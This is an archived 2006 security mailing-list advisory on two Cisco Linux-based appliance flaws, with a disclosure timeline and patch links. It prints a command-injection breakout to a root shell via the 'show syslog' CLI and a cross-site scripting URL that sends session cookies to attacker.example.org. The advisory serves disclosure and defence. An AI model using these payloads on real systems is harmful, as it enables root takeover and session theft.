Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Multiple Vulnerabilities in Linux Based Cisco Products

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Multiple Vulnerabilities in Linux Based Cisco Products
Date: 2 May 2006 10:56:22 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Multiple Vulnerabilities in Linux Based Cisco Products
------------------------------------------------------------------------


SUMMARY

The following vulnerabilities have been discovered in various Cisco Linux 
based products:
 * A Vulnerability in the CiscoWorks WLSE "show" CLI application allows 
execution of arbitrary code as the root user.
 * Cross-site scripting flaw allows session theft

DETAILS

Software:
 * Cisco Wireless Lan Solution Engine (WLSE)
 * Cisco Hosting Solution Engine (HSE)
 * Cisco Ethernet Subscriber Solution Engine (ESSE)
 * Cisco User Registration Tool (URT)
 * CiscoWorks2000 Service Management Solution (SMS)
 * Cisco Vlan Policy Server (VPS)
 * Cisco Management Engine (ME1100 Series)
 * CiscoWorks Service Level Manager (SLM)

Vulnerability information:
(1) The Cisco shell presents the administrator with a restricted set of 
commands which includes a "show" application. The "show" application has 
several vulnerabilities which allow an attacker to "break out" of the 
shell and execute commands (including /bin/sh) as the root user.

This "show" application has been in use on this Linux-based platform build 
since 1999 and exists on several other Linux-based Cisco products.

Example:
An Administrator is logged into the Cisco WLSE via either Telnet or SSH.

  admin@wlse: show version
   (C) Copyright 2005 by Cisco Systems Inc.
   WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
   Device Limit = 2550
   Build Version (67) Tue Mar 15 18:13:02 UTC 2005
   Uptime: 2 days 3 hours 32 mins
   Linux version 2.4.28-5_WLSEsmp (root@app20.cisco.com) (gcc version 2.96 
20000731
   (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
   1130
   Intel(R) CPU at 3065.897 Mhz with 3105924K bytes of memory.

  admin@wlse: show syslog include ";/bin/sh -i;"

  sh-2.05a# id
   uid=0(root) gid=502(admin) groups=502(admin),500(enable)

At this point the administrator has root level access to the Linux-based 
Cisco device.

(2) A cross-site scripting flaw exists in: 
/wlse/configure/archive/archiveApplyDisplay.jsp with the "displayMsg" 
parameter. This can be used to steal the JSP session cookie, therefore 
giving a targeted attacker admin level access to the system. Once the 
attacker has admin web GUI access to the system via the XSS, they can then 
change the admin password or create a new admin user (without requiring 
the admin password).

The attacker can then use the aforementioned "show cli" local root 
vulnerability to gain complete control of the Cisco Linux-Based system.

As with (1) above Telnet or SSH access is required to login with the newly 
created user with admin level access in order to exploit the "show cli" 
bug.

Example:
   http://cisco-wlse.example.org/wlse/configure/archive/ \
   archiveApplyDisplay.jsp?displayMsg=<script>document.location='http:// \
   attacker.example.org?'+document.cookie</script>

The cookie posted to attacker.example.org includes the JSESSIONID token:
   ORIG_URL=cisco-wlse.example.org; browser_tzoffset=-660; \
   JSESSIONID=johjehk2h1; \
   HSE_TKT=admin:1133234898:17e5187e228ab1546ac26ef4ecacf689

When combined with vulnerability (1), it allows a targeted attacker to 
gain root access to the Linux system.

Solution:
Cisco has released patches for the vulnerabilities.

Cisco advisory note:
 <http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml> 
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml

Cisco security response:
 <http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml> 
http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml

Disclosure timeline:
30-Dec-2005 - Discovered during configuration for a customer
29-Jan-2006 - Email sent to psirt[at]cisco.com with full technical details
31-Jan-2006 - Response received from Cisco psirt
01-Feb-2006 - Cisco advises bug reports have been opened for both issues
05-Apr-2006 - Cisco releases patches to Assurance.com.au for testing
19-Apr-2006 - Advisory released


ADDITIONAL INFORMATION

The information has been provided by  
<mailto:advisories+cisco200604@assurance.com.au> assurance.com.au.
The original article can be found at:  
<http://www.assurance.com.au/advisories/200604-cisco.txt> 
http://www.assurance.com.au/advisories/200604-cisco.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Multiple Vulnerabilities in Linux Based Cisco Products, SecuriTeam <=
Previous by Date:  [NEWS] Cisco Unity Express Privilege Escalation, SecuriTeam
Next by Date:  [UNIX] Jupiter CMS Directory Traversal, SecuriTeam
Previous by Thread:  [NEWS] Cisco Unity Express Privilege Escalation, SecuriTeam
Next by Thread:  [UNIX] Jupiter CMS Directory Traversal, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]